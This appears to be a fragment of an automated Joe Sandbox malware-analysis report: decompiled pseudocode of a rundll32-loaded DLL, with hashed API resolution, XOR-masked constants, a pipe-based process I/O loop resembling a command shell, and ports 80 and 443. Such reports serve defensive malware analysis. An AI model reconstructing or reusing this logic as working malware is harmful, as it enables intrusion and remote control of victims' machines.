                  				E0000000118000459C(0x176fdd38, E00000001180008368,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				_t72 = _t129 + 7;
                  				if (E00000001180008368 == 0) goto 0x80003b4c;
                  				r8d = _t72;
                  				E00000001180008368(_t54, E00000001180008368,  *((intOrPtr*)( *0x8000d4a0 + 0x30)), _t118);
                  				goto 0x80003b4f;
                  				_t94 = _t129;
                  				 *(_t97 + 0x10) = _t94;
                  				if (_t94 != _t129) goto 0x80003bb0;
                  				E0000000118000459C(0xb27f4910, _t94,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t94 == 0) goto 0x80003b79;
                  				 *_t94();
                  				goto 0x80003b7b;
                  				if (0 != 0) goto 0x80003bd6;
                  				E0000000118000459C(0x176fdd38, _t94,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t94 == 0) goto 0x80003ba4;
                  				r8d = _t72;
                  				 *_t94();
                  				goto 0x80003ba7;
                  				_t95 = _t129;
                  				 *(_t97 + 0x10) = _t95;
                  				if (_t95 == _t129) goto 0x80003bd6;
                  				_t28 = _t97 + 0x18; // 0x18
                  				E00000001180006C8C(2, _t95, _t97, E0000000118000431C, _t97, _t116, _t118, _t28);
                  				 *(_t97 + 8) = _t95;
                  				if (_t95 == 0) goto 0x80003bd6;
                  				SwitchToThread();
                  				goto 0x80003c03;
                  				_t49 = GetLastError();
                  				if (_t49 == 0) goto 0x80003c03;
                  				E00000001180007950(r13d, _t97, _t97, _t113, _t116, _t118);
                  				if (r13d == 0) goto 0x80003c03;
                  				E0000000118000459C(0x9cb92d3f, _t95,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t95 == 0) goto 0x80003c03;
                  				 *_t95();
                  				return _t49;
                  			}


















                  0x180003a24
                  0x180003a29
                  0x180003a2e
                  0x180003a3f
                  0x180003a48
                  0x180003a4b
                  0x180003a51
                  0x180003a56
                  0x180003a5f
                  0x180003a65
                  0x180003a6e
                  0x180003a74
                  0x180003a74
                  0x180003a82
                  0x180003a89
                  0x180003a94
                  0x180003aa2
                  0x180003aa7
                  0x180003aaa
                  0x180003ab2
                  0x180003ab9
                  0x180003ac0
                  0x180003ac3
                  0x180003ac7
                  0x180003acd
                  0x180003ad4
                  0x180003ada
                  0x180003add
                  0x180003ae5
                  0x180003aeb
                  0x180003af2
                  0x180003af8
                  0x180003afc
                  0x180003b03
                  0x180003b09
                  0x180003b0d
                  0x180003b14
                  0x180003b1f
                  0x180003b29
                  0x180003b30
                  0x180003b35
                  0x180003b3d
                  0x180003b42
                  0x180003b48
                  0x180003b4a
                  0x180003b4c
                  0x180003b4f
                  0x180003b56
                  0x180003b61
                  0x180003b69
                  0x180003b75
                  0x180003b77
                  0x180003b7d
                  0x180003b8b
                  0x180003b93
                  0x180003b95
                  0x180003ba0
                  0x180003ba2
                  0x180003ba4
                  0x180003ba7
                  0x180003bae
                  0x180003bb0
                  0x180003bbe
                  0x180003bc3
                  0x180003bca
                  0x180003bcc
                  0x180003bd4
                  0x180003bd6
                  0x180003be0
                  0x180003be5
                  0x180003bec
                  0x180003bf7
                  0x180003bff
                  0x180003c01
                  0x180003c21

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CloseCriticalHandleSection$CreateEvent$DeleteEnterErrorFreeHeapInitializeLastLeaveMutexObjectSingleSleepSwitchThreadWaitmemcpy
                  • String ID:
                  • API String ID: 810493412-0
                  • Opcode ID: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
                  • Instruction ID: da56e0963138b123f8a3a91eab94b9da458cf35c37d31fe2a2e97a6efbfc397b
                  • Opcode Fuzzy Hash: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
                  • Instruction Fuzzy Hash: 5F51C332301B4882EB97DF22A4117DA73A8FB8CBD8F448524AE5D47795EF38CA09C350
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 54%
                  			E00000001180002B60(void* __esi, void* __rcx, void* __r9, void* __r10, signed long long __r11) {
                  				void* __rbx;
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t79;
                  				signed int _t94;
                  				void* _t143;
                  				void* _t144;
                  				long long _t174;
                  				long long* _t175;
                  				long long* _t178;
                  				void* _t180;
                  				long long _t182;
                  				void* _t190;
                  				intOrPtr _t211;
                  				void* _t224;
                  				void* _t225;
                  				long long _t228;
                  				void* _t229;
                  				void* _t255;
                  				signed long long _t256;
                  
                  				_t256 = __r11;
                  				_t255 = __r10;
                  				_t144 = __esi;
                  				_t174 = _t228;
                  				_t229 = _t228 - 0x60;
                  				r12d =  *0x8000d498;
                  				 *(_t174 + 0x20) =  *(_t174 + 0x20) & 0x00000000;
                  				_t225 = __rcx;
                  				if (E00000001180002464(_t174, _t180,  *0x8000d4a0 + 0x28, __rcx) != 0) goto 0x80002bd9;
                  				_t79 = E00000001180002464(_t174, _t180,  *0x8000d4a0 + 0x20, _t225);
                  				if (_t79 == 0) goto 0x80002bd9;
                  				HeapFree(??, ??, ??);
                  				if (_t79 != 0) goto 0x80002f0d;
                  				_t190 = _t229 + 0x48;
                  				if (E00000001180008C60(_t180, _t190, _t224, _t225) != 0) goto 0x80002ed2;
                  				r9d =  *( *((intOrPtr*)(_t225 + 0x40)) + 2) & 0x0000ffff;
                  				if (_t190 - __r9 + 8 <= 0) goto 0x80002c2b;
                  				if ((r12d ^ 0xe49a1e6d) == 0) goto 0x80002c2d;
                  				E00000001180004ED8(r12d ^ 0xe49a1e6d, __r9 +  *((intOrPtr*)(_t225 + 0x40)) + 8);
                  				_t182 = _t174;
                  				goto 0x80002c2d;
                  				if (_t182 == 0) goto 0x80002ec8;
                  				_t21 = _t225 + 0xb0; // 0xb0
                  				 *((long long*)(_t229 + 0x28)) = _t182;
                  				 *(_t229 + 0x20) =  *(_t229 + 0x20) & 0x00000000;
                  				if (E000000011800022AC(_t182, _t174, _t182, _t21,  *((intOrPtr*)(_t229 + 0x48)), _t225,  *0x8000d490,  *((intOrPtr*)(_t225 + 0x30)),  *((intOrPtr*)(_t225 + 0x38))) != 0) goto 0x80002ec8;
                  				_t175 =  *((intOrPtr*)(_t225 + 0x28));
                  				 *((long long*)(_t229 + 0x40)) = _t175;
                  				if (E00000001180002370(r12d ^ 0x61f25585, _t175, _t182, _t256) != 0) goto 0x80002caf;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)),  *((intOrPtr*)(_t229 + 0x48)), _t229 + 0xa8) == 0) goto 0x80002caf;
                  				goto 0x80002cb8;
                  				 *(_t229 + 0xa8) = 0;
                  				E0000000118000459C(0xab05e147, _t175,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				r15d = 0x7f;
                  				if (_t175 == 0) goto 0x80002cec;
                  				r9d = 0;
                  				r8d = 0;
                  				 *_t175();
                  				goto 0x80002cef;
                  				if (r15d != 0x102) goto 0x80002ec8;
                  				 *(_t225 + 0x64) = 0x3e8;
                  				if (E00000001180002370(r12d ^ 0x64d094d6, _t175, _t182, _t256) != 0) goto 0x80002d41;
                  				 *(_t229 + 0x20) =  *(_t229 + 0x20) & 0x00000000;
                  				r9d = 0;
                  				E00000001180002668(_t175, _t182, _t225, 0x180001844, _t225,  *0x8000d490,  *((intOrPtr*)(_t229 + 0x38)), _t229 + 0xb0);
                  				if (E00000001180002370(r12d ^ 0xdd4632ba, _t175, _t182, _t256) != 0) goto 0x80002d8f;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xa8) == 0) goto 0x80002d8f;
                  				_t94 =  *(_t229 + 0xa8);
                  				if (_t94 == 0) goto 0x80002d8f;
                  				 *(_t225 + 0x64) = _t94 * 0x3e8;
                  				if (E00000001180002370(r12d ^ 0x705ce798, _t175, _t182, _t256) != 0) goto 0x80002dd2;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xa8) == 0) goto 0x80002dd2;
                  				goto 0x80002ddb;
                  				 *(_t229 + 0xa8) = 0;
                  				r12d = r12d ^ 0xe5c7ba87;
                  				if (E00000001180002370(r12d, _t175, _t182, _t256) != 0) goto 0x80002e40;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xb8) == 0) goto 0x80002e40;
                  				GetSystemTimeAsFileTime(??);
                  				r11d =  *((intOrPtr*)(_t229 + 0xb8));
                  				 *((intOrPtr*)(_t225 + 0x60)) = r11d;
                  				_t178 = _t256 * 0x23c34600 +  *((intOrPtr*)(_t229 + 0x50));
                  				 *((long long*)(_t225 + 0x58)) = _t178;
                  				if (E00000001180007DBC(0, E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xb8), _t225, _t229 + 0x58, _t229 + 0x30) != 0) goto 0x80002e68;
                  				r8d =  *((intOrPtr*)(_t229 + 0x30));
                  				E0000000118000137C(_t144, _t182, _t225,  *((intOrPtr*)(_t229 + 0x58)), _t255);
                  				E0000000118000459C(0xab05e147, _t178,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t178 == 0) goto 0x80002e97;
                  				r8d = 0;
                  				r9d = 0;
                  				r9d = r9d * 0x3e8;
                  				 *_t178();
                  				goto 0x80002e9a;
                  				_t143 = r15d;
                  				if (_t143 != 0) goto 0x80002e40;
                  				if ( *((intOrPtr*)(_t225 + 0x50)) == 0) goto 0x80002ec8;
                  				E00000001180007950(0xab05e147,  *((intOrPtr*)( *0x8000d4a0 + 8)),  *((intOrPtr*)(_t225 + 0x50)), _t224,  *((intOrPtr*)(_t225 + 0x50)),  *0x8000d490);
                  				HeapFree(??, ??, ??);
                  				E00000001180002620();
                  				_t211 =  *0x8000d4a0;
                  				if ( *((intOrPtr*)(_t211 + 0x20)) == 0) goto 0x80002ef8;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t211 + 0x28)) == 0) goto 0x80002f0d;
                  				HeapFree(??, ??, ??);
                  				asm("lock inc ecx");
                  				return _t143;
                  			}
























                  0x180002b60
                  0x180002b60
                  0x180002b60
                  0x180002b60
                  0x180002b6d
                  0x180002b7f
                  0x180002b86
                  0x180002b8a
                  0x180002ba9
                  0x180002bb7
                  0x180002bc0
                  0x180002bd3
                  0x180002bdb
                  0x180002be1
                  0x180002bef
                  0x180002bfc
                  0x180002c11
                  0x180002c1a
                  0x180002c21
                  0x180002c26
                  0x180002c29
                  0x180002c30
                  0x180002c43
                  0x180002c4a
                  0x180002c4f
                  0x180002c5d
                  0x180002c63
                  0x180002c80
                  0x180002c8c
                  0x180002ca4
                  0x180002cad
                  0x180002cb1
                  0x180002cc1
                  0x180002cc6
                  0x180002ccf
                  0x180002ce0
                  0x180002ce3
                  0x180002ce6
                  0x180002cea
                  0x180002cf5
                  0x180002d14
                  0x180002d22
                  0x180002d29
                  0x180002d36
                  0x180002d3c
                  0x180002d61
                  0x180002d79
                  0x180002d7b
                  0x180002d84
                  0x180002d8c
                  0x180002daf
                  0x180002dc7
                  0x180002dd0
                  0x180002dd4
                  0x180002ddb
                  0x180002dfc
                  0x180002e14
                  0x180002e1b
                  0x180002e21
                  0x180002e2c
                  0x180002e37
                  0x180002e3c
                  0x180002e54
                  0x180002e56
                  0x180002e63
                  0x180002e71
                  0x180002e79
                  0x180002e7b
                  0x180002e7e
                  0x180002e8a
                  0x180002e91
                  0x180002e95
                  0x180002e97
                  0x180002e9c
                  0x180002ea5
                  0x180002eb5
                  0x180002ec2
                  0x180002ecd
                  0x180002ed2
                  0x180002ee3
                  0x180002eeb
                  0x180002eff
                  0x180002f07
                  0x180002f0d
                  0x180002f23

                  APIs
                    • Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                    • Part of subcall function 0000000180002464: FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002BD3
                  • GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180002E1B
                  • HeapFree.KERNEL32 ref: 0000000180002EC2
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002EEB
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002F07
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Free$Heap$LibraryTime$FileLoadSystem
                  • String ID:
                  • API String ID: 1415693639-0
                  • Opcode ID: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
                  • Instruction ID: d455ad72a2173ea311d53c287058b5208197830efbff1c216518b590d8193917
                  • Opcode Fuzzy Hash: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
                  • Instruction Fuzzy Hash: A5A15172204B8996EBA2DB66E4407DA73A5F78D7D4F448022FA4D47A95DF38C64AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 26%
                  			E000000011800027D4(long long __rbx, intOrPtr* __rcx, void* __rdx) {
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t100;
                  				long long* _t119;
                  				long long* _t120;
                  				long long* _t121;
                  				long long* _t122;
                  				long long* _t123;
                  				void* _t151;
                  				void* _t152;
                  				intOrPtr* _t153;
                  				void* _t155;
                  				void* _t158;
                  				long long* _t161;
                  				void* _t163;
                  				void* _t164;
                  				long _t176;
                  				void* _t178;
                  				void* _t181;
                  				void* _t184;
                  
                  				_t123 = __rbx;
                  				 *((long long*)(_t163 + 0x10)) = __rbx;
                  				 *(_t163 + 0x18) = r8d;
                  				_t164 = _t163 - 0x50;
                  				_t119 =  *0x8000d4a0;
                  				_t156 =  *__rcx;
                  				_t153 = __rcx;
                  				r15d = r9d;
                  				E00000001180007B04(__rbx, __rdx, __rcx,  *__rcx, _t158, __rdx, _t184, _t181);
                  				if (_t119 == _t123) goto 0x80002a78;
                  				_t100 =  *((char*)(_t153 + 0x75)) - 6;
                  				_t5 = _t123 + 4; // 0x4
                  				r12d = _t5;
                  				if (_t100 > 0) goto 0x8000283e;
                  				if (_t100 != 0) goto 0x80002835;
                  				if ( *((char*)(_t153 + 0x74)) - 2 > 0) goto 0x8000283e;
                  				 *((intOrPtr*)(_t164 + 0x90)) = 0;
                  				goto 0x80002846;
                  				 *((intOrPtr*)(_t164 + 0x90)) = r12d;
                  				E0000000118000459C(0x3fe3c8ba, _t119,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t119 == _t123) goto 0x80002871;
                  				r9d = 0;
                  				r8d = 0;
                  				 *((intOrPtr*)(_t164 + 0x20)) = 0;
                  				 *_t119();
                  				goto 0x80002874;
                  				_t120 = _t123;
                  				 *((long long*)(_t153 + 0x28)) = _t120;
                  				HeapFree(_t178, _t176, _t152);
                  				if ( *((intOrPtr*)(_t153 + 0x28)) == _t123) goto 0x80002a78;
                  				if ( *((intOrPtr*)(_t164 + 0xa0)) == 0) goto 0x800028ce;
                  				E0000000118000459C(0xe7f09937, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x800028c4;
                  				_t17 = _t164 + 0xa0; // 0x12
                  				r9d = r12d;
                  				 *_t120();
                  				goto 0x800028c6;
                  				if (0 == 0) goto 0x80002a78;
                  				E00000001180007B04(_t123,  *((intOrPtr*)(_t153 + 8)), _t153, _t156, _t119, _t17, _t155, _t158);
                  				if (_t120 == _t123) goto 0x80002a78;
                  				 *((intOrPtr*)(_t164 + 0x90)) = 0x100;
                  				if ( *((intOrPtr*)(_t164 + 0xb0)) == 0) goto 0x80002938;
                  				 *((intOrPtr*)(_t164 + 0x40)) = 0xaa0;
                  				E0000000118000459C(0xe7f09937, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x80002927;
                  				r9d = r12d;
                  				 *_t120();
                  				asm("bts dword [esp+0x90], 0x17");
                  				r12d = 0x1bb;
                  				goto 0x8000293e;
                  				r12d = 0x50;
                  				E0000000118000459C(0x7dda0345, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x80002963;
                  				r9d = 0;
                  				r8d = r12w & 0xffffffff;
                  				 *_t120();
                  				goto 0x80002966;
                  				_t121 = _t123;
                  				 *((long long*)(_t153 + 0x30)) = _t121;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t153 + 0x30)) == _t123) goto 0x80002a78;
                  				E00000001180007B04(_t123,  *((intOrPtr*)(_t153 + 0x10)), _t153, _t156, _t120, _t120);
                  				_t161 = _t121;
                  				if (_t121 == _t123) goto 0x80002a78;
                  				E0000000118000459C(0xaa9d9fc1, _t121,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t121 == _t123) goto 0x800029ed;
                  				_t151 =  !=  ?  *0x8000d490 + 0x180011260 :  *0x8000d490 + 0x180011278;
                  				r9d = 0;
                  				 *((intOrPtr*)(_t164 + 0x30)) =  *((intOrPtr*)(_t164 + 0x90));
                  				 *((long long*)(_t164 + 0x28)) = _t123;
                  				 *((long long*)(_t164 + 0x20)) = _t123;
                  				 *_t121();
                  				goto 0x800029f0;
                  				_t122 = _t123;
                  				 *((long long*)(_t153 + 0x38)) = _t122;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t153 + 0x38)) == _t123) goto 0x80002a78;
                  				 *((intOrPtr*)(_t164 + 0x44)) = 4;
                  				E0000000118000459C(0x677ec78c, _t122,  *((intOrPtr*)(_t156 + 0x50)));
                  				_t45 = _t161 + 0x1b; // 0x1f
                  				r12d = _t45;
                  				if (_t122 == _t123) goto 0x80002a40;
                  				 *_t122();
                  				goto 0x80002a42;
                  				if (0 == 0) goto 0x80002a80;
                  				asm("bts dword [esp+0x90], 0x8");
                  				E0000000118000459C(0xe7f09937, _t122,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t122 == _t123) goto 0x80002a80;
                  				r9d = 4;
                  				 *_t122();
                  				goto 0x80002a80;
                  				return GetLastError();
                  			}
























                  0x1800027d4
                  0x1800027d4
                  0x1800027d9
                  0x1800027e9
                  0x1800027ed
                  0x1800027f4
                  0x180002805
                  0x18000280d
                  0x180002810
                  0x18000281d
                  0x180002823
                  0x180002827
                  0x180002827
                  0x18000282b
                  0x18000282d
                  0x180002833
                  0x180002835
                  0x18000283c
                  0x18000283e
                  0x18000284f
                  0x180002857
                  0x180002860
                  0x180002863
                  0x180002869
                  0x18000286d
                  0x18000286f
                  0x180002871
                  0x18000287c
                  0x180002880
                  0x18000288a
                  0x180002897
                  0x1800028a2
                  0x1800028aa
                  0x1800028b0
                  0x1800028b8
                  0x1800028c0
                  0x1800028c2
                  0x1800028c8
                  0x1800028d4
                  0x1800028df
                  0x1800028e5
                  0x1800028f7
                  0x180002902
                  0x18000290a
                  0x180002912
                  0x18000291d
                  0x180002925
                  0x180002927
                  0x180002930
                  0x180002936
                  0x180002938
                  0x180002947
                  0x18000294f
                  0x180002955
                  0x180002958
                  0x18000295f
                  0x180002961
                  0x180002963
                  0x18000296e
                  0x180002972
                  0x18000297c
                  0x180002988
                  0x18000298d
                  0x180002993
                  0x1800029a2
                  0x1800029aa
                  0x1800029c9
                  0x1800029d4
                  0x1800029d7
                  0x1800029df
                  0x1800029e4
                  0x1800029e9
                  0x1800029eb
                  0x1800029ed
                  0x1800029f8
                  0x1800029fc
                  0x180002a06
                  0x180002a12
                  0x180002a1a
                  0x180002a1f
                  0x180002a1f
                  0x180002a26
                  0x180002a3c
                  0x180002a3e
                  0x180002a44
                  0x180002a46
                  0x180002a58
                  0x180002a60
                  0x180002a6e
                  0x180002a74
                  0x180002a76
                  0x180002a99

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$AllocErrorLastlstrlenmemset
                  • String ID: P
                  • API String ID: 1242601240-3110715001
                  • Opcode ID: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
                  • Instruction ID: b9b39858d45b2fed8cd52d627653eb03beea5c07a2efbf285fd96505e9c46d20
                  • Opcode Fuzzy Hash: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
                  • Instruction Fuzzy Hash: E2718B7230468897EBA2DF62A8443DA73A0F78DBC4F488425AF4E47B46CF38D658C710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 471 180008368-1800083a8 CreateEventA 472 180008598-18000859e GetLastError 471->472 473 1800083ae-1800083cc call 18000459c 471->473 474 1800085a0-1800085a8 472->474 479 1800083ce-1800083de 473->479 480 1800083e0 473->480 476 1800085aa CloseHandle 474->476 477 1800085b0-1800085b9 474->477 476->477 481 1800083e2-1800083e4 479->481 480->481 481->472 483 1800083ea-1800083ee ResumeThread 481->483 484 1800083f4-180008405 GetExitCodeProcess 483->484 484->472 485 18000840b-180008415 484->485 486 180008593-180008596 485->486 487 18000841b-18000843f PeekNamedPipe 485->487 486->472 486->474 487->472 488 180008445-18000844a 487->488 489 18000844c-18000846d ReadFile 488->489 490 18000848d-18000849e call 18000459c 488->490 489->472 491 180008473-180008487 call 180004258 489->491 496 1800084b3 490->496 497 1800084a0-1800084b1 490->497 491->472 491->490 498 1800084b5-1800084b7 496->498 497->498 498->472 500 1800084bd-1800084c4 498->500 501 1800084c6-1800084e4 WriteFile 500->501 502 1800084ee-18000850a WaitForMultipleObjects 500->502 501->472 504 1800084ea 501->504 502->474 503 180008510-180008513 502->503 505 180008519-18000852a call 18000459c 503->505 506 1800085ba-1800085bf 503->506 504->502 510 180008544 505->510 511 18000852c-180008542 505->511 506->486 508 1800085c1 506->508 508->484 512 180008546-18000854c 510->512 511->512 514 180008581 512->514 515 18000854e-18000856f WriteFile 512->515 518 180008583-180008585 514->518 519 1800085c6-1800085cb 514->519 516 180008571-18000857c ResetEvent 515->516 517 18000858b-180008591 GetLastError 515->517 516->484 517->486 518->484 518->517 519->474
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorFileLast$EventWrite$CloseCodeCreateExitHandleMultipleNamedObjectsPeekPipeProcessReadResetResumeThreadWait
                  • String ID: .RK
                  • API String ID: 1606758550-3354657194
                  • Opcode ID: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
                  • Instruction ID: c67b93fc325dec5a333161014b43f1cf91cc3d00d80d1a92eadb22293fcdf481
                  • Opcode Fuzzy Hash: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
                  • Instruction Fuzzy Hash: 6C614032314A49D2EB92CB25E9947DA73E0FB8C7C5F408121FB8987A94DF38D658DB10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$Alloc$CriticalSectionlstrlen$EnterEscapeLeavelstrcpymemcpy
                  • String ID:
                  • API String ID: 1109037607-0
                  • Opcode ID: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
                  • Instruction ID: acf6d717728defc35103db72fb922d6f00203a7e454cd640fbdac6a35d594990
                  • Opcode Fuzzy Hash: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
                  • Instruction Fuzzy Hash: F0519A35304B8986EB96CB67A8447DA73A5FB8DFC4F44C025EE4A83754EE39C609C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CloseHandle$CriticalSection$Sleep$DeleteEnterEventFreeHeapLeaveObjectSingleWait
                  • String ID:
                  • API String ID: 2177250193-0
                  • Opcode ID: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
                  • Instruction ID: f3fed24fe94b1aa8e153d29e7a34276cc5438fe7d956490b47d4b11a712edef8
                  • Opcode Fuzzy Hash: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
                  • Instruction Fuzzy Hash: EA31F536701A4986EB96DF62E8503AD3360FB98FD4F44C021EA5E936A5DF38CA4DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                  • String ID: H
                  • API String ID: 948315288-2852464175
                  • Opcode ID: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
                  • Instruction ID: 40cf2675a00ff9b37053f4863b037564f167e8a7fa8b642abd638291e1f5e275
                  • Opcode Fuzzy Hash: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
                  • Instruction Fuzzy Hash: 7F914C32209B4996EBA6CF15E4447A9B3A1F74DBC4F09C129EA8D47754EF3CDA4AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 25%
                  			E0000000118000431C(void* __edx, signed long long __rax, long long __rbx, intOrPtr* __rcx, long long __rbp, signed short _a8, intOrPtr _a16, long long _a24, long long _a32) {
                  				void* _v40;
                  				void* _v56;
                  				void* _v72;
                  				void* __rdi;
                  				void* __rsi;
                  				long _t75;
                  				signed long long _t121;
                  				signed long long _t122;
                  				intOrPtr* _t124;
                  				void* _t151;
                  				void* _t158;
                  				void* _t172;
                  
                  				_t162 = __rbp;
                  				_t121 = __rax;
                  				_a24 = __rbx;
                  				_a32 = __rbp;
                  				_t161 =  *0x8000d4a0;
                  				_t124 = __rcx;
                  				r14d = 0;
                  				WaitForSingleObject(??, ??);
                  				if ( *((intOrPtr*)(__rcx + 0x50)) == r14d) goto 0x8000449d;
                  				E0000000118000459C(0xb74c62f4, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
